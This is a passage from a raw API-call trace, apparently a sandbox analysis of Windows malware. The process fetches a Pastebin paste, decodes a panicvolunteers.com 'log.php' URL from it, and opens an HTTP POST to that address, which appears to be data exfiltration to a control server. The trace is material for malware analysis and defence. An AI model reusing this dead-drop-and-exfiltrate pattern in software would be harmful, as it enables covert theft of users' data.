0xc9a2a0 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ae8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2b8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ac8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2d0 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ab8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a258 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1aa8 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a270 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1a98 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a288 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1a88 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a210 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1a78 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a228 [0266.971] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1a68 [0266.972] InternetCrackUrlW (in: lpszUrl="http://pastebin.com/raw.php?i=7MDswaSn", dwUrlLength=0x26, dwFlags=0x0, lpUrlComponents=0x75e730 | out: lpUrlComponents=0x75e730) returned 1 [0267.035] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2d0 | out: hHeap=0xb80000) returned 1 [0267.035] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbf1f8 [0267.035] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a288 | out: hHeap=0xb80000) returned 1 [0267.035] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbf248 [0267.035] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a210 | out: hHeap=0xb80000) returned 1 [0267.035] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbf270 [0267.035] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x28) returned 0xbbc480 [0267.035] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1c68 [0267.035] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a228 | out: hHeap=0xb80000) returned 1 [0267.035] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xbd00c8 [0267.036] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbc480 | out: hHeap=0xb80000) returned 1 [0267.036] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1c68 | out: hHeap=0xb80000) returned 1 [0267.036] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0267.036] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x75e778, dwBufferLength=0x8) returned 1 [0267.036] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x75e784 | out: lpBuffer=0x0, lpdwBufferLength=0x75e784) returned 0 [0267.134] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xc9a0d8 [0267.134] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0xc9a0d8, lpdwBufferLength=0x75e784 | out: lpBuffer=0xc9a0d8, lpdwBufferLength=0x75e784) returned 1 [0267.134] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a0d8 | out: hHeap=0xb80000) returned 1 [0267.134] InternetConnectW (hInternet=0xcc0004, lpszServerName="pastebin.com", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0267.135] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/raw.php?i=7MDswaSn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0267.136] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0268.166] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x75e738, lpdwBufferLength=0x75e730, lpdwIndex=0x75e734*=0x0 | out: lpBuffer=0x75e738*, lpdwBufferLength=0x75e730*=0x4, lpdwIndex=0x75e734*=0x0) returned 1 [0268.167] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x75e754, lpdwBufferLength=0x75e780, lpdwIndex=0x75e784*=0x0 | out: lpBuffer=0x75e754, lpdwBufferLength=0x75e780, lpdwIndex=0x75e784*=0x0) returned 0 [0268.167] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x75e6b8 | out: lpCharType=0x75e6b8) returned 1 [0268.167] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x75e734, dwFlags=0x0, dwContext=0x0) returned 1 [0268.167] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x2b) returned 0xdfa520 [0268.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdfa520, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x75e738 | out: lpBuffer=0xdfa520*, lpdwNumberOfBytesRead=0x75e738*=0x2b) returned 1 [0268.167] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xda55b0 [0268.167] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xd47260 [0268.167] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x2b) returned 0xdfa558 [0268.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdfa558, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x75e738 | out: lpBuffer=0xdfa558*, lpdwNumberOfBytesRead=0x75e738*=0x0) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfa558 | out: hHeap=0xb80000) returned 1 [0268.167] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbd00c8 | out: hHeap=0xb80000) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a68 | out: hHeap=0xb80000) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbf270 | out: hHeap=0xb80000) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a78 | out: hHeap=0xb80000) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbf248 | out: hHeap=0xb80000) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a88 | out: hHeap=0xb80000) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a270 | out: hHeap=0xb80000) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1a98 | out: hHeap=0xb80000) returned 1 [0268.167] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a258 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1aa8 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbf1f8 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ab8 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2b8 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ac8 | out: hHeap=0xb80000) returned 1 [0268.168] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1ac8 [0268.168] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x2b) returned 0xbd00c8 [0268.168] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0268.168] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0268.168] CloseHandle (hObject=0x0) returned 0 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfa520 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd47260 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda55b0 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2a0 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ae8 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc039e8 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1af8 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc03938 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ad8 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a318 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe528 | out: hHeap=0xb80000) returned 1 [0268.168] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b08 | out: hHeap=0xb80000) returned 1 [0268.168] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x2c) returned 0xdfa520 [0268.168] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b08 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x58) returned 0xd5bfe8 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ad8 [0268.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xdfa520, cbMultiByte=44, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x58) returned 0xd5c0a8 [0268.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xdfa520, cbMultiByte=44, lpWideCharStr=0xd5c0a8, cchWideChar=44 | out: lpWideCharStr="https://panicvolunteers.com/bgr/log/log.php") returned 44 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd5c0a8 | out: hHeap=0xb80000) returned 1 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a300 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfa520 | out: hHeap=0xb80000) returned 1 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b08 | out: hHeap=0xb80000) returned 1 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbd00c8 | out: hHeap=0xb80000) returned 1 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ac8 | out: hHeap=0xb80000) returned 1 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a360 | out: hHeap=0xb80000) returned 1 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe500 | out: hHeap=0xb80000) returned 1 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b28 | out: hHeap=0xb80000) returned 1 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xbbe500 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a360 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b28 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a318 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2a0 [0268.169] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0268.169] PeekMessageW (in: lpMsg=0x75ede4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75ede4) returned 1 [0268.169] TranslateMessage (lpMsg=0x75ede4) returned 0 [0268.169] DispatchMessageW (lpMsg=0x75ede4) returned 0x0 [0268.169] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbc73f0 [0268.170] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1ac8 [0268.170] Shell_NotifyIconW (dwMessage=0x1, lpData=0x75e480) returned 1 [0268.170] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc73f0 | out: hHeap=0xb80000) returned 1 [0268.170] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ac8 | out: hHeap=0xb80000) returned 1 [0268.170] KillTimer (hWnd=0x60172, uIDEvent=0x1) returned 1 [0268.170] SetTimer (hWnd=0x60172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0268.170] PeekMessageW (in: lpMsg=0x75ede4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75ede4) returned 0 [0268.170] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1ac8 [0268.170] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b08 [0268.170] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbc73f0 [0268.170] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1af8 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc73f0 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1af8 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b08 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ac8 | out: hHeap=0xb80000) returned 1 [0268.171] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xbd39b0 [0268.171] PeekMessageW (in: lpMsg=0x75ede4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75ede4) returned 0 [0268.171] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1ac8 [0268.171] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a300 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1ac8 | out: hHeap=0xb80000) returned 1 [0268.171] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a948 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbd39b0 | out: hHeap=0xb80000) returned 1 [0268.171] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a300 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a948 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbb318 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2e8 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a330 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba50e0 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe4d8 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a2a0 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a318 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a360 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b28 | out: hHeap=0xb80000) returned 1 [0268.171] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe500 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a378 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0268.172] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a378 [0268.172] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a360 [0268.172] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xbc1b48 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a300 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0268.172] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a300 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a450 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a4c8 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a468 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a408 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a480 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a420 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a438 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3c0 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3d8 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.172] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbbe488 | out: hHeap=0xb80000) returned 1 [0268.172] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.172] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1b48 [0268.172] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xca79b8 [0268.172] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xa) returned 0xc9a3d8 [0268.172] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xbc3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x75efc0*="Open", cNames=0x1, lcid=0x800, rgDispId=0x75f0c4 | out: rgDispId=0x75f0c4*=1) returned 0x0 [0268.173] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3d8 | out: hHeap=0xb80000) returned 1 [0268.173] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xbc3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x75efb8 | out: ppTInfo=0x75efb8*=0xdb817c) returned 0x0 [0268.181] ITypeInfo:RemoteGetTypeAttr (in: This=0xdb817c, ppTypeAttr=0x75efb0, pDummy=0x356310 | out: ppTypeAttr=0x75efb0, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.181] ITypeInfo:LocalGetIDsOfNames (This=0xdb817c) returned 0x0 [0268.181] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x0, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.185] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbe6060 [0268.185] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x1, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.185] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.185] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x2, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.185] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbbb318 [0268.185] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x3, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.185] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbe6060 [0268.185] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x4, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.185] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbe6060 [0268.185] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x5, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.185] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd81e78 [0268.185] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x6, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.185] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xd91a20 [0268.185] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x7, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.186] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbe6060 [0268.186] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x8, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.186] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbe6060 [0268.186] ITypeInfo:RemoteGetFuncDesc (in: This=0xdb817c, index=0x9, ppFuncDesc=0x75efb4, pDummy=0x356310 | out: ppFuncDesc=0x75efb4, pDummy=0x356310*=0x3225e4) returned 0x0 [0268.186] ITypeInfo:LocalReleaseTypeAttr (This=0xdb817c) returned 0xd678e0 [0268.186] ITypeInfo:LocalReleaseFuncDesc (This=0xdb817c) returned 0xbe6060 [0268.186] WinHttpRequest:IUnknown:Release (This=0xdb817c) returned 0x1 [0268.186] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x44) returned 0xdb3fc0 [0268.187] WinHttpRequest:IDispatch:Invoke (in: This=0xbc3298, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x75f0a8*(rgvarg=([0]=0xdb3fc4*(varType=0xb, wReserved1=0x0, wReserved2=0x6064, wReserved3=0xbe, varVal1=0x0, varVal2=0x0), [1]=0xdb3fd4*(varType=0x8, wReserved1=0xda, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xdb3fe4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070, puArgErr=0x75f0b8 | out: pDispParams=0x75f0a8*(rgvarg=([0]=0xdb3fc4*(varType=0xb, wReserved1=0x0, wReserved2=0x6064, wReserved3=0xbe, varVal1=0x0, varVal2=0x0), [1]=0xdb3fd4*(varType=0x8, wReserved1=0xda, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xdb3fe4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x75f070*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x75f0b8*=0x2b5995) returned 0x0 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xca79b8 | out: hHeap=0xb80000) returned 1 [0268.191] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a348 [0268.191] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a2e8 [0268.191] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbc1a78 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdb3fc0 | out: hHeap=0xb80000) returned 1 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a3f0 | out: hHeap=0xb80000) returned 1 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b48 | out: hHeap=0xb80000) returned 1 [0268.191] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xc9a3f0 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a348 | out: hHeap=0xb80000) returned 1 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9a510 | out: hHeap=0xb80000) returned 1 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc1b38 | out: hHeap=0xb80000) returned 1 [0268.191] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, 